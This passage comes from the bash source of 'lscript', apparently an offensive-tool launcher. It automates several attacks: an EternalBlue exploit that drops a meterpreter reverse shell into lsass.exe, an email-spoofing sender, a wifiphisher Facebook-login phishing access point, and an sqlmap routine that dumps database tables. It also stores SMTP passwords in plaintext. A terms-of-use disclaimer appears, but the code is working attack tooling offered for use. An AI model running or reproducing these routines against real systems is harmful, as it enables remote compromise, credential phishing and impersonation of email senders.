  5687. clear
  5688. echo -e "There is an update available."
  5689. echo -e "Current version: $VERSION"
  5690. echo -e "Updated version: $VER"
  5691. echo -e "$PAKTC"
  5692. $READAK
  5693. clear
  5694. echo -e "Do you want to update?"$YNONLY": "
  5695. read UPDATEYN
  5696. if [[ "$UPDATEYN" = "y" ]]
  5697. then
  5698. clear
  5699. #~ echo -e "Making new directory for the old lscript (will pass it to /root/lscriptold)"
  5700. sleep 1
  5701. if [[ -d /root/lscriptold ]]
  5702. then
  5703. rm -r /root/lscriptold
  5704. fi
  5705. mkdir /root/lscriptold
  5706. echo -e ""
  5707. #~ echo -e "Moving lscript to lscriptold"
  5708. sleep 1
  5709. mv "$LPATH" /root/lscriptold
  5710. #~ echo -e "Cloning the latest github version to new "$LPATH""
  5711. sleep 1
  5712. cd
  5713. git clone https://github.com/arismelachroinos/lscript.git
  5714. cd "$LPATH"
  5715. chmod +x install.sh
  5716. clear
  5717. sleep 1
  5718. if [[ -f /root/lscriptold/lscript/IAGREE.txt ]]
  5719. then
  5720. cp /root/lscriptold/lscript/IAGREE.txt "$LPATH"
  5721. fi
  5722. if [[ -d /root/lscriptold/lscript/ks ]]
  5723. then
  5724. echo -e "Copying your shortcuts"
  5725. cp -r /root/lscriptold/lscript/ks "$LPATH"
  5726. echo -e "Done."
  5727. sleep 0.2
  5728. fi
  5729. if [[ -d /root/lscriptold/lscript/settings ]]
  5730. then
  5731. echo -e "Copying your settings"
  5732. cp -r /root/lscriptold/lscript/settings "$LPATH"
  5733. echo -e "Done."
  5734. sleep 0.2
  5735. fi
  5736. if [[ -f /root/lscriptold/lscript/wlanmon.txt ]]
  5737. then
  5738. echo -e "Copying your interfaces"
  5739. cp /root/lscriptold/lscript/wlanmon.txt "$LPATH"
  5740. echo -e "Done."
  5741. sleep 0.2
  5742. fi
  5743. echo -e ""
  5744. if [[ -f /root/lscriptold/lscript/wlan.txt ]]
  5745. then
  5746. cp /root/lscriptold/lscript/wlan.txt "$LPATH"
  5747. echo -e "Done."
  5748. sleep 0.2
  5749. clear
  5750. fi
  5751. echo -e "$PAKTC"
  5752. $READAK
  5753. cd "$LPATH"
  5754. gnome-terminal -e ./install.sh
  5755. clear
  5756. sleep 1
  5757. rm -rf /root/lscriptold
  5758. echo -e "Exiting..."
  5759. sleep 1
  5760. kill -9 $PPID
  5761. else
  5762. clear
  5763. echo -e "You didnt select "y" so you go back..."
  5764. sleep 3
  5765. exec bash "$0"
  5766. fi
  5767. else
  5768. echo -e "There is no update available"
  5769. sleep 1
  5770. echo -e "Installed version: $VERSION"
  5771. sleep 1
  5772. echo -e "Github version: $VER"
  5773. sleep 1
  5774. echo -e "$PAKTGB"
  5775. $READAK
  5776. exec bash "$0"
  5777. fi
  5778. else
  5779. clear
  5780. echo -e "There is no connection."
  5781. sleep 1
  5782. echo -e "Maybe you should type 'stop' in the main manu to gain internet access again"
  5783. echo -e ""
  5784. echo -e "$PAKTGB"
  5785. $READAK
  5786. exec bash "$0"
  5787. fi
  5788. }
  5789. function hidden_shortcuts
  5790. {
  5791. clear
  5792. TERMINALTITLE="HIDDEN SHORTCUTS"
  5793. dash_calc
  5794. printf '\033]2;HIDDEN SHORTCUTS\a'
  5795. echo -e ""$YS" interface"$CE") Change your interface"
  5796. echo -e ""$YS" wififb"$CE") Create open wifi access point and get fb passwords with wifiphisher"
  5797. echo -e ""$YS"eternalblue"$CE") Launch msfconsole with eternalblue exploit on target"
  5798. echo -e ""$YS" etercheck"$CE") Check if a target is vulnerable to eternalblue exploit"
  5799. echo -e ""$YS" changelog"$CE") View the changelog of the lscript versions"
  5800. echo -e ""$YS" pstart"$CE") Service postgresql start"
  5801. echo -e ""$YS" pstop"$CE") Service postgresql stop"
  5802. echo -e ""$YS" nstart"$CE") Service network-manager start"
  5803. echo -e ""$YS" nstop"$CE") Service network-manager stop"
  5804. echo -e ""$YS" astart"$CE") Service apache2 start"
  5805. echo -e ""$YS" astop"$CE") Service apache2 stop"
  5806. echo -e ""$YS"nessusstart"$CE") Start Nessus"
  5807. echo -e ""$YS" nessusstop"$CE") Stop Nessus"
  5808. echo -e ""$YS" 00"$CE") Go to main menu"
  5809. echo -e "$PAKTGB"
  5810. $READAK
  5811. clear
  5812. }
  5813. function one_time_per_launch_ks
  5814. {
  5815. if [[ -d ""$KSPATH"/nums" ]]
  5816. then
  5817. rm -r "$KSPATH"/nums
  5818. fi
  5819. mkdir "$KSPATH"/nums
  5820. nn=1
  5821. ff=1
  5822. HOWMANY=0
  5823. HOWADD=$(( HOWMANYTOOLS + 1 ))
  5824. while [[ "$nn" != "$HOWADD" ]]
  5825. do
  5826. listshortcuts
  5827. if [[ -f ""$KSPATH"/"$TITLE"/"$TITLE"ks.txt" ]]
  5828. then
  5829. echo -e "$TITLE" > "$KSPATH"/nums/"$ff".txt
  5830. ff=$(( ff+1 ))
  5831. HOWMANY=$(( HOWMANY+1 ))
  5832. fi
  5833. nn=$(( nn+1 ))
  5834.  
  5835. done
  5836. ONETIMEPERLAUNCH="1"
  5837. }
  5838. function interface_menu
  5839. {
  5840. WLANN=$(cat "$LPATH"/wlan.txt)
  5841. WLANNM=$(cat "$LPATH"/wlanmon.txt)
  5842. echo -e "Your current wireless interface names are $WLANN and $WLANNM"
  5843. sleep 2
  5844. echo -e "Do you want to change you interface names?"$YNYES": "
  5845. read INAG
  5846. if [[ "$INAG" = "n" ]]
  5847. then
  5848. clear
  5849. echo -e "Then why did you come here? lol"
  5850. sleep 3
  5851. exec bash "$0"
  5852. else
  5853. clear
  5854. rm "$LPATH"/wlan.txt
  5855. rm "$LPATH"/wlanmon.txt
  5856. set_interface_number
  5857. fi
  5858. }
  5859. function tools_menu
  5860. {
  5861. while true
  5862. do
  5863. clear
  5864. TERMINALTITLE="TOOLS"
  5865. dash_calc
  5866. printf '\033]2;TOOLS\a'
  5867. echo -e ""$YS" 1"$CE") Wifi tools"
  5868. echo -e ""$YS" 2"$CE") Remote access"
  5869. echo -e ""$YS" 3"$CE") Information gathering"
  5870. echo -e ""$YS" 4"$CE") Webside tools"
  5871. echo -e ""$YS" 5"$CE") Others"
  5872. echo -e ""$YS" 6"$CE") Install/reinstall a tool"
  5873. echo -e ""$YS" i"$CE") Info"
  5874. echo -e ""$YS" b"$CE") Go back"
  5875. #~ echo -e ""$YS"00"$CE") Main menu"
  5876. echo -e ""$YS" 0"$CE") EXIT"
  5877. echo "Choose: "
  5878. read -e CATEG
  5879. clear
  5880. if [[ "$CATEG" = "1" ]]
  5881. then
  5882. wifi_tools
  5883. elif [[ "$CATEG" = "2" ]]
  5884. then
  5885. remote_access
  5886. elif [[ "$CATEG" = "3" ]]
  5887. then
  5888. information_gathering
  5889. elif [[ "$CATEG" = "4" ]]
  5890. then
  5891. website_tools
  5892. elif [[ "$CATEG" = "5" ]]
  5893. then
  5894. other_tools
  5895. elif [[ "$CATEG" = "6" ]]
  5896. then
  5897. reinstall_tools
  5898. elif [[ "$CATEG" = "0" ]]
  5899. then
  5900. clear
  5901. exit
  5902. elif [[ "$CATEG" = "back" || "$CATEG" = "b" || "$CATEG" = 00 ]]
  5903. then
  5904. BACKL="1"
  5905. break
  5906. elif [[ "$CATEG" = "i" ]]
  5907. then
  5908. TERMINALTITLE="INFO"
  5909. dash_calc
  5910. printf '\033]2;INFO\a'
  5911. echo -e ""$LGYS"Wifi tools:"
  5912. echo -e " Mostly focused on network attacks, MITM, DoS, evil-twin and phishing."
  5913. echo -e "Remote access:"
  5914. echo -e " Mostly focused on payload generation, listeners, exploits, scanners"
  5915. echo -e " and bypassing anti-virus software."
  5916. echo -e "Information gathering:"
  5917. echo -e " Self-explained."
  5918. echo -e "Other tools:"
  5919. echo -e " Some very usefull tools that don't fit to the other categories."
  5920. echo -e "Install/reinstall a tool:"
  5921. echo -e " From here you can install any tool available in the lazy script."
  5922. echo -e " If it is already installed, it will be deleted and reistalled."$CE""
  5923. echo -e ""
  5924. echo -e ""$BS"Do you want another tool to be added in the script?"$CE""
  5925. echo -e ""$BS"Submit it as an issue on my github repo:"$CE""
  5926. echo -e " "$YS"https://github.com/arismelachroinos/lscript"$CE""
  5927. echo -e ""
  5928. echo -e ""
  5929. echo -e "$PAKTGB"
  5930. $READAK
  5931. fi
  5932. done
  5933. }
  5934. function public_ip
  5935. {
  5936. clear
  5937. echo -e ""$BS"Please wait..."$CE""
  5938. CHECKMON=$(ifconfig | grep "mon")
  5939. if [[ "$CHECKMON" = "" ]]
  5940. then
  5941. clear
  5942. PUBLICIP=$(curl -s ipinfo.io/ip)
  5943. if [[ "$PUBLICIP" = "" ]]
  5944. then
  5945. PUBLICIP=$(curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//')
  5946. if [[ "$PUBLICIP" = "" ]]
  5947. then
  5948. clear
  5949. PUBLICIP="Connection error."
  5950. fi
  5951. fi
  5952. echo "Your public IP is: "$PUBLICIP""
  5953. #~ curl -s checkip.dyndns.org | sed -e 's/.*Current IP Address: //' -e 's/<.*$//'
  5954. else
  5955. echo -e "When monitor mode is enabled, you don't have internet access."
  5956. echo -e "Select 'd2' to disable monitor mode"
  5957. echo -e "$PAKTGB"
  5958. $READAK
  5959. clear
  5960. exec bash "$0"
  5961. fi
  5962. }
  5963. function terms_of_use
  5964. {
  5965. printf '\033]2;TERMS OF USE\a'
  5966. clear
  5967. echo -e ""$RS"You need to accept the terms."$CE""
  5968. sleep 1
  5969. echo -e "$PAKTC"
  5970. $READAK
  5971. clear
  5972. echo -e "This tool is only for educational purposes only."
  5973. echo -e "Use this tool only on your own network and never without permission."
  5974. echo -e "I am not responsible for anything you do with this tool."
  5975. echo -e "Will you use this tool only on your own network and only with your own responsibility?("$YS"YES"$CE"/"$YS"NO"$CE"): "
  5976. read YESORNO
  5977. if [[ "$YESORNO" = "YES" ]]
  5978. then
  5979. echo "You have agreed the terms and you use this tool with your own responsibility." > "$LPATH"/IAGREE.txt
  5980. sleep 1
  5981. clear
  5982. else
  5983. echo -e "You didn't type 'YES' , so you cannot continue"
  5984. sleep 4
  5985. fi
  5986. exec bash "$0"
  5987. }
  5988. function eternalblue
  5989. {
  5990. if [[ ! -d "$LPATH"/rce ]]
  5991. then
  5992. mkdir "$LPATH"/rce
  5993. fi
  5994. EG=$(local_ips $WLANN)
  5995. if [[ "$EG" != "" ]]
  5996. then
  5997. echo -e "LHOST: ("$YS""Enter""$CE"="$EG") "
  5998. else
  5999. echo -e "LHOST: "
  6000. fi
  6001. read LHOSTL
  6002. if [[ "$EG" != "" && "$LHOSTL" = "" ]]
  6003. then
  6004. LHOSTL="$EG"
  6005. fi
  6006. echo -e "RHOST: "
  6007. read RHOSTL
  6008. echo -e "TARGETARCHITECTURE("$YS"x86"$CE"/"$YS"x64"$CE"): "
  6009. read TARGETARCHL
  6010. if [[ "$TARGETARCHL" = "x64" ]]
  6011. then
  6012. PROCESSINJECTL="lsass.exe"
  6013. PAYLOADL="windows/x64/meterpreter/reverse_tcp"
  6014. else
  6015. PAYLOADL="windows/meterpreter/reverse_tcp"
  6016. fi
  6017. echo -e "TARGET("$YS"0"$CE"-"$YS"8"$CE"): "
  6018. read TARGETL
  6019. echo "use exploit/windows/smb/eternalblue_doublepulsar" > "$LPATH"/rce/eternalbluerc.rc
  6020. echo "set LHOST "$LHOSTL"" >> "$LPATH"/rce/eternalbluerc.rc
  6021. echo "set RHOST "$RHOSTL"" >> "$LPATH"/rce/eternalbluerc.rc
  6022. echo "set PAYLOAD "$PAYLOADL"" >> "$LPATH"/rce/eternalbluerc.rc
  6023. echo "set TARGET "$TARGETL"" >> "$LPATH"/rce/eternalbluerc.rc
  6024. echo "set TARGETARCHITECTURE "$TARGETARCHL"" >> "$LPATH"/rce/eternalbluerc.rc
  6025. echo "set PROCESSINJECT "$PROCESSINJECTL"" >> "$LPATH"/rce/eternalbluerc.rc
  6026. echo "show info" >> "$LPATH"/rce/eternalbluerc.rc
  6027. echo "exploit -j" >> "$LPATH"/rce/eternalbluerc.rc
  6028. msfconsole -r "$LPATH"/rce/eternalbluerc.rc
  6029.  
  6030. }
  6031. function eternalblue_check
  6032. {
  6033. if [[ ! -d "$LPATH"/rce ]]
  6034. then
  6035. mkdir "$LPATH"/rce
  6036. fi
  6037. echo -e "RHOST:("$BS"if scanning multiple hosts, seperate with space"$CE") "
  6038. read RHOSTL
  6039. echo "use auxiliary/scanner/smb/smb_ms17_010" > "$LPATH"/rce/eternalbluerc.rc
  6040. echo "set RHOSTS "$RHOSTL"" >> "$LPATH"/rce/eternalbluerc.rc
  6041. echo "exploit" >> "$LPATH"/rce/eternalbluerc.rc
  6042. msfconsole -r "$LPATH"/rce/eternalbluerc.rc
  6043.  
  6044. }
  6045. function start_menu
  6046. {
  6047. O1=0
  6048. O2=0
  6049. O3=0
  6050. echo -e "Enabling $WLANNM..."
  6051. enable_wlan
  6052. echo -e "Killing services..."
  6053. airmon-ng check kill &> /dev/null && echo -e ""$YS"Done"$CE"" && O1=1
  6054. echo -e "Starting monitor mode..."
  6055. if [[ "$ALFA" = "yes" ]]
  6056. then
  6057. ifconfig $WLANN down
  6058. iwconfig $WLANN mode monitor &> /dev/null && echo -e ""$YS"Done"$CE"" && O2=1
  6059. ifconfig $WLANN up
  6060. else
  6061. airmon-ng start $WLANN | grep "monitor mode" | awk -F "(" {'print $2'} | cut -d ')' -f1 &> /dev/null && echo -e ""$YS"Done"$CE"" && O2=1
  6062. fi
  6063. if [[ -f "$LPATH"/settings/startmac.txt ]]
  6064. then
  6065. read STARTMAC < "$LPATH"/settings/startmac.txt
  6066. else
  6067. STARTMAC="$DEFMAC"
  6068. fi
  6069. echo -e "Changing mac address of $WLANNM to "$STARTMAC"..."
  6070. ifconfig $WLANNM down
  6071. macchanger -m $STARTMAC $WLANNM &> /dev/null | grep "New MAC:" &> /dev/null && O3=1
  6072. ifconfig $WLANNM up && echo -e ""$YS"Done"$CE""
  6073. if [[ "$O1" = 1 && "$O2" = 1 && "$O3" = 1 && "$O4" = 1 ]]
  6074. then
  6075. BACKL=1
  6076. fi
  6077. }
  6078. function stop_menu
  6079. {
  6080. O1=0
  6081. O2=0
  6082. O3=0
  6083. stop_monitor
  6084. echo -e "Changing mac address of $WLANN to the original one..."
  6085. ifconfig $WLANN down
  6086. macchanger -p $WLANN | grep "Current MAC:" && O1=1
  6087. ifconfig $WLANN up
  6088. echo -e ""$YS"Done"$CE""
  6089. if [[ "$O1" = 1 && "$O2" = 1 && "$O3" = 1 ]]
  6090. then
  6091. BACKL=1
  6092. fi
  6093. }
  6094. function stop_monitor
  6095. {
  6096. echo -e "Disabling $WLANNM..."
  6097. echo -e "Stopping monitor mode..."
  6098. if [[ "$ALFA" = "yes" ]]
  6099. then
  6100. A1=0
  6101. A2=0
  6102. A3=0
  6103. ifconfig $WLANN down && A1=1
  6104. iwconfig $WLANN mode managed && A2=1
  6105. ifconfig $WLANN up && A3=1
  6106. if [[ "$A1" = 1 && "$A2" = 1 && "$A3" = 1 ]]
  6107. then
  6108. echo -e ""$YS"Done"$CE"" && O2=1
  6109. else
  6110. echo -e ""$RS"Error stoping monitor mode."$CE""
  6111. fi
  6112. else
  6113. airmon-ng stop $WLANNM &>/dev/null && echo -e ""$YS"Done"$CE"" && O2=1 || echo -e ""$RS"Error stoping monitor mode."$CE""
  6114. fi
  6115. echo -e "Starting network-manager service..."
  6116. service network-manager start && echo -e ""$YS"Done"$CE"" && O3=1 || echo -e ""$RS"Error starting network-manager service"$CE""
  6117. }
  6118. function spoof_email
  6119. {
  6120. while true
  6121. do
  6122. sm=0
  6123. clear
  6124. if [[ ! -d /bin/lscript/smtp ]]
  6125. then
  6126. mkdir /bin/lscript/smtp
  6127. fi
  6128. echo -e ""$RS"YOU SHOULD FIRST SIGN UP ON https://www.smtp2go.com AND VERIFY YOUR EMAIL."$CE""
  6129. echo -e ""$RS"THEN GO TO https://app.smtp2go.com/settings/users AND MAKE A USERNAME AND PASS."$CE""
  6130. echo -e ""$RS" ########ALWAYS HAVE PERMISSION OF THE EMAILS YOU SPOOF########"$CE""
  6131. echo -e ""$RS" ########DONT SEND VIRUSES , PHISHING OR ILLEGAL THINGS########"$CE""
  6132. if [[ ! -f /bin/lscript/smtp/smtpemail.txt ]]
  6133. then
  6134. echo -e ""$YS" 1"$CE") Set your SMTP username and pass "$RS"NOT SET"$CE""
  6135. else
  6136. read smtpemail < /bin/lscript/smtp/smtpemail.txt
  6137. echo -e ""$YS" 1"$CE") Set your SMTP username and pass Current: "$YS""$smtpemail""$CE""
  6138. fi
  6139. echo -e ""$YS" 2"$CE") Send a spoofed email"
  6140. echo -e ""$YS" 3"$CE") Clear your SMTP username and pass from lscript"
  6141. echo -e ""$YS" 4"$CE") Fix email failed"
  6142. echo -e ""$YS" b"$CE") Go back"
  6143. echo -e ""$YS" 0"$CE") EXIT"
  6144. read SMTP
  6145. if [[ "$SMTP" = "1" ]]
  6146. then
  6147. clear
  6148. echo -e "Enter your smtp username(find it here: https://app.smtp2go.com/settings/users ): "
  6149. read SMTPEMAIL
  6150. echo -e "Enter your smtp password(find it here: https://app.smtp2go.com/settings/users ): "
  6151. read SMTPPASS
  6152. clear
  6153. echo "$SMTPEMAIL" > /bin/lscript/smtp/smtpemail.txt
  6154. echo "$SMTPPASS" > /bin/lscript/smtp/smtppass.txt
  6155. echo -e "Credentials saved on /bin/lscript/smtp"
  6156. sleep 3
  6157. elif [[ "$SMTP" = "4" ]]
  6158. then
  6159. clear
  6160. echo -e "If you email fails, the reason is because on option 1 you didnt set the correct username and password. Find those at https://app.smtp2go.com/settings/users."
  6161. sleep 2
  6162. echo -e "$PAKTGB"
  6163. read -e -n 1 -r
  6164. elif [[ "$SMTP" = "3" ]]
  6165. then
  6166. if [[ -f /bin/lscript/smtp/smtpemail.txt ]]
  6167. then
  6168. rm /bin/lscript/smtp/smtpemail.txt
  6169. echo -e "Username removed"
  6170. else
  6171. echo -e "Not username found"
  6172. fi
  6173. if [[ -f /bin/lscript/smtp/smtppass.txt ]]
  6174. then
  6175. rm /bin/lscript/smtp/smtppass.txt
  6176. echo -e "Password removed"
  6177. else
  6178. echo -e "Not password found"
  6179. fi
  6180. sleep 2
  6181. continue
  6182. elif [[ "$SMTP" = "0" ]]
  6183. then
  6184. clear
  6185. exit
  6186. elif [[ "$SMTP" = "back" || "$SMTP" = "b" ]]
  6187. then
  6188. clear
  6189. break
  6190. elif [[ "$SMTP" = "2" ]]
  6191. then
  6192. while true
  6193. do
  6194. clear
  6195. if [[ ! -f /bin/lscript/smtp/smtpemail.txt ]]
  6196. then
  6197. echo -e "No smtp username found."
  6198. sm=1
  6199. fi
  6200. if [[ ! -f /bin/lscript/smtp/smtppass.txt ]]
  6201. then
  6202. echo -e "No smtp pass found."
  6203. sm=1
  6204. fi
  6205. if [[ "$sm" = 1 ]]
  6206. then
  6207. break
  6208. fi
  6209. read smtppass < /bin/lscript/smtp/smtppass.txt
  6210. read smtpemail < /bin/lscript/smtp/smtpemail.txt
  6211. clear
  6212. echo -e "Your username is "$RS""$smtpemail""$CE""
  6213. echo -e ""
  6214. echo -e "Enter the target's email: "
  6215. read TARGETSEMAIL
  6216. echo -e "Enter the email that you want the target to see: "
  6217. read SPOOFEDEMAIL
  6218. echo -e "Enter the subject of the message: "
  6219. read SUBJECTEMAIL
  6220. echo -e "Enter the message: "
  6221. read MESSAGEEMAIL
  6222. echo -e "Enter the smtp server ("$YS"Enter"$CE"=mail.smtp2go.com): "
  6223. read SMTPSERVER
  6224. if [[ "$SMTPSERVER" = "" ]]
  6225. then
  6226. SMTPSERVER="mail.smtp2go.com"
  6227. fi
  6228. echo -e "Enter the smtp port ("$YS"Enter"$CE"=2525): "
  6229. read SMTPPORT
  6230. if [[ "$SMTPPORT" = "" ]]
  6231. then
  6232. SMTPPORT="2525"
  6233. fi
  6234. echo -e "Press "$YS"enter"$CE" to send the message to "$TARGETSEMAIL""
  6235. read
  6236. clear
  6237. sendemail -f $SPOOFEDEMAIL -t $TARGETSEMAIL -u $SUBJECTEMAIL -m $MESSAGEEMAIL -s "$SMTPSERVER":"$SMTPPORT" -xu "$smtpemail" -xp "$smtppass"
  6238. echo -e "$PAKTGB"
  6239. read -e -n 1 -r
  6240. break
  6241. done
  6242. fi
  6243. done
  6244. }
  6245. function new_terminal
  6246. {
  6247. while true
  6248. do
  6249. clear
  6250. if [[ "$ALFA" = "yes" ]]
  6251. then
  6252. CHECKMON=$(iwconfig "$WLANN" | grep "Mode:Monitor")
  6253. else
  6254. CHECKMON=$(ifconfig | grep "$WLANNM")
  6255. fi
  6256. clear
  6257. if [[ "$CHECKMON" = "" ]]
  6258. then
  6259. echo -e "Monitor mode is not enabled."
  6260. echo -e ""
  6261. echo -e "Do you want to enable monitor mode? "$YNYES": "
  6262. read MONITOREN
  6263. clear
  6264. if [[ "$MONITOREN" = "n" ]]
  6265. then
  6266. #~ echo -e "Select 'start' or '2' to enable it"
  6267. echo -e "$PAKTGB"
  6268. $READAK
  6269. clear
  6270. exec bash "$0"
  6271. else
  6272. CHECKWL=$(ifconfig | grep "$WLANN")
  6273. if [[ "$CHECKWL" == "" ]]
  6274. then
  6275. echo -e ""$RS""$WLANN" was not found"$CE""
  6276. sleep 2
  6277. BACKL=1
  6278. break
  6279. fi
  6280. start_menu
  6281. continue
  6282. fi
  6283. else
  6284. if [[ "$YORNAA" = "10" ]]
  6285. then
  6286. echo -e "Moving into new terminal..."
  6287. sleep 1
  6288. FJC=0
  6289. export FJC
  6290. gnome-terminal --geometry 87x35+9999+0 -- lh1
  6291. sleep 1
  6292. exec bash "$0"
  6293. break
  6294. elif [[ "$YORNAA" = "11" ]]
  6295. then
  6296. clear
  6297. echo -e "Moving into new terminal..."
  6298. sleep 1
  6299. gnome-terminal --geometry 80x25+9999+0 -- lh3
  6300. sleep 1
  6301. exec bash "$0"
  6302. break
  6303. elif [[ "$YORNAA" = "12" ]]
  6304. then
  6305. echo -e "Moving into new terminal..."
  6306. sleep 1
  6307. gnome-terminal --geometry 80x25+9999+0 -- lh4
  6308. sleep 1
  6309. exec bash "$0"
  6310. break
  6311. fi
  6312. fi
  6313. done
  6314. }
  6315. function check_if_ks
  6316. {
  6317. while [ $var1 -le $HOWMANY ]
  6318. do
  6319. if [[ -f "$KSPATH"/nums/"$var1".txt ]]
  6320. then
  6321. read TITLE < "$KSPATH"/nums/"$var1".txt
  6322. read YORNAKS < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
  6323. if [[ "$YORNAA" = "$YORNAKS" ]]
  6324. then
  6325. read COMMAND1 < ""$KSPATH"/"$TITLE"/"$TITLE".txt"
  6326. read COMMAND2 < ""$KSPATH"/"$TITLE"/"$TITLE"2.txt"
  6327. $COMMAND1
  6328. #~ if [[ -f ""$KSPATH"/"$TITLE"/"$TITLE"3.txt" ]]
  6329. #~ then
  6330. #~ read $COMMAND3 < ""$KSPATH"/"$TITLE"/"$TITLE"3.txt"
  6331. #~ $COMMAND3
  6332. #~ fi
  6333. $COMMAND2
  6334. BACKL="1"
  6335. fi
  6336. fi
  6337. var1=$(( var1+1 ))
  6338. done
  6339. }
  6340. function wififb
  6341. {
  6342. echo -e "Enter the name of the access point you want to create: "
  6343. read -e ESSIDAP
  6344. export ESSIDAP
  6345. xterm -hold -geometry 90x60+9999+999999 -e bash -c 'printf "\033]2;WIFI FB TRAP\a" && wifiphisher --nojamming --essid "$ESSIDAP" -p oauth-login; exec bash' & disown
  6346. }
  6347. function sqlmap_menu
  6348. {
  6349. file2="/root/lscript/sqltemp2"
  6350. file3="/root/lscript/sqltemp3"
  6351. file4="/root/lscript/sqltemp34"
  6352. while true
  6353. do
  6354. clear
  6355. TERMINALTITLE="SQLMAP"
  6356. dash_calc
  6357. printf '\033]2;SQLMAP\a'
  6358. if [[ "$URL" = "" ]]
  6359. then
  6360. URL=""$RS"None"$CE""
  6361. urls=0
  6362. fi
  6363. if [[ "$FDBS" = "" ]]
  6364. then
  6365. FDBS=""$RS"None"$CE""
  6366. fdbss=0
  6367. fi
  6368. if [[ "$SD" = "" ]]
  6369. then
  6370. SD=""$RS"None"$CE""
  6371. sds=0
  6372. fi
  6373. if [[ "$TB" = "" ]]
  6374. then
  6375. TB=""$RS"None"$CE""
  6376. tbs=0
  6377. fi
  6378. if [[ "$ST" = "" ]]
  6379. then
  6380. ST=""$RS"None"$CE""
  6381. sts=0
  6382. fi
  6383. if [[ "$CL" = "" ]]
  6384. then
  6385. CL=""$RS"None"$CE""
  6386. cls=0
  6387. fi
  6388. if [[ "$SC" = "" ]]
  6389. then
  6390. SC=""$RS"None"$CE""
  6391. scs=0
  6392. fi
  6393. echo -e ""$YS" 1"$CE") URL Current:"$YS"$URL"$CE""
  6394. if [[ "$urls" = 0 ]]
  6395. then
  6396. echo -e ""$RS" 2"$CE") Fetch databases Current:$FDBS"
  6397. else
  6398. echo -e ""$YS" 2"$CE") Fetch databases Current:$FDBS"
  6399. fi
  6400. if [[ "$fdbss" = 0 ]]
  6401. then
  6402. echo -e ""$RS" 3"$CE") Select database Current:"$YS"$SD"$CE""
  6403. else
  6404. echo -e ""$YS" 3"$CE") Select database Current:"$YS"$SD"$CE""
  6405. fi
  6406. if [[ "$sds" = 0 ]]
  6407. then
  6408. echo -e ""$RS" 4"$CE") Fetch tables Current:"$YS"$TB"$CE""
  6409. else
  6410. echo -e ""$YS" 4"$CE") Fetch tables Current:"$YS"$TB"$CE""
  6411. fi
  6412. if [[ "$tbs" = 0 ]]
  6413. then
  6414. echo -e ""$RS" 5"$CE") Select table Current:"$YS"$ST"$CE""
  6415. else
  6416. echo -e ""$YS" 5"$CE") Select table Current:"$YS"$ST"$CE""
  6417. fi
  6418. if [[ "$sts" = 0 ]]
  6419. then
  6420. echo -e ""$RS" 6"$CE") Fetch columns Current:"$YS"$CL"$CE""
  6421. else
  6422. echo -e ""$YS" 6"$CE") Fetch columns Current:"$YS"$CL"$CE""
  6423. fi
  6424. if [[ "$cls" = 0 ]]
  6425. then
  6426. echo -e ""$RS" 7"$CE") Select columns Current:"$YS"$SC"$CE""
  6427. else
  6428. echo -e ""$YS" 7"$CE") Select columns Current:"$YS"$SC"$CE""
  6429. fi
  6430. if [[ "$scs" = 0 ]]
  6431. then
  6432. echo -e ""$RS" s"$CE") Start"
  6433. else
  6434. echo -e ""$YS" s"$CE") Start"
  6435. fi
  6436. echo -e ""$YS" b"$CE") Go back"
  6437. echo -e "Choose: "
  6438. read SQ
  6439. clear
  6440. if [[ "$SQ" = 1 ]]
  6441. then
  6442. echo -n "URL: "
  6443. read URLL
  6444. if [[ "$URLL" != "" || "$URLL" = "b" ]]
  6445. then
  6446. URL="$URLL"
  6447. urls=1
  6448. ##Clearing nexts
  6449. FDBS=""
  6450. fdbss=0
  6451. SD=""
  6452. sds=0
  6453. TB=""
  6454. tbs=0
  6455. ST=""
  6456. sts=0
  6457. cls=0
  6458. CL=""
  6459. scs=0
  6460. SC=""
  6461. fi
  6462. elif [[ "$SQ" = "s" ]]
  6463. then
  6464. if [[ "$scs" = 0 ]]
  6465. then
  6466. echo -e ""$RS"No columns selected"$CE""
  6467. sleep 2
  6468. break
  6469. fi
  6470. #~ export URL
  6471. #~ export SD
  6472. #~ export ST
  6473. #~ export SC
  6474. sqlmap -u "$URL" -D "$SD" -T "$ST" -C "$SC" --dump | tee "$file4"
  6475. echo -e ""
  6476. echo -e ""$YS"A log file has been created on "$file4". Copy it before it gets overwritten"$CE""
  6477. echo -e ""
  6478. echo -e "$PAKTGB"
  6479. $READAK
  6480. elif [[ "$SQ" = "b" ]]
  6481. then
  6482. break
  6483. elif [[ "$SQ" = 00 ]]
  6484. then
  6485. exec bash $0
  6486. elif [[ "$SQ" = 7 ]]
  6487. then
  6488. if [[ "$cls" = 0 ]]
  6489. then
  6490. echo -e ""$RS"Columns not fetched"$CE""
  6491. sleep 2
  6492. break
  6493. fi
  6494. n10=1
  6495. CCO1="$CO1"
  6496. while [[ "$n10" -le "$NCO" ]]
  6497. do
  6498. cl[$n10]=$(cat "$file3" | awk -v n12="$CCO1" '{if(NR==n12)print}' | cut -d ' ' -f2)
  6499. CCO1=$((CCO1+1))
  6500. n10=$((n10+1))
  6501. done
  6502. while true
  6503. do
  6504. clear
  6505. echo -e ""$BS"Columns: "$CE""
  6506. v=1
  6507. while [[ "$v" -le "$NCO" ]]
  6508. do
  6509. if [[ "${selc[$v]}" = 1 ]]
  6510. then
  6511. SSC="$YS"
  6512. else
  6513. SSC="$WS"
  6514. fi
  6515. if [[ "$v" -le 9 ]]
  6516. then
  6517. echo -e ""$YS" $v"$CE") "$SSC"${cl[$v]}"$CE""
  6518. elif [[ "$v" -le 99 ]]
  6519. then
  6520. echo -e ""$YS" $v"$CE") "$SSC"${cl[$v]}"$CE""
  6521. else
  6522. echo -e ""$YS"$v"$CE") "$SSC"${cl[$v]}"$CE""
  6523. fi
  6524. v=$((v+1))
  6525. done
  6526. echo -e ""$YS" d"$CE") Deselect all"
  6527. echo -e ""$YS" s"$CE") Save selection"
  6528. echo -e ""$YS" b"$CE") Go back"
  6529. echo -e "Choose: "
  6530. read COCH
  6531. clear
  6532. if [[ "$COCH" = "b" || "$COCH" = "back" ]]
  6533. then
  6534. break
  6535. elif [[ "$COCH" = "s" ]]
  6536. then
  6537. v2=1
  6538. SC=""
  6539. while [[ "$v2" -le "$NCO" ]]
  6540. do
  6541. if [[ "${selc[$v2]}" = 1 ]]
  6542. then
  6543. if [[ "$SC" = "" ]]
  6544. then
  6545. SC="${cl[$v2]}"
  6546. else
  6547. SC=""$SC","${cl[$v2]}""
  6548. fi
  6549. fi
  6550. v2=$((v2+1))
  6551. done
  6552. if [[ "$SC" = "" ]]
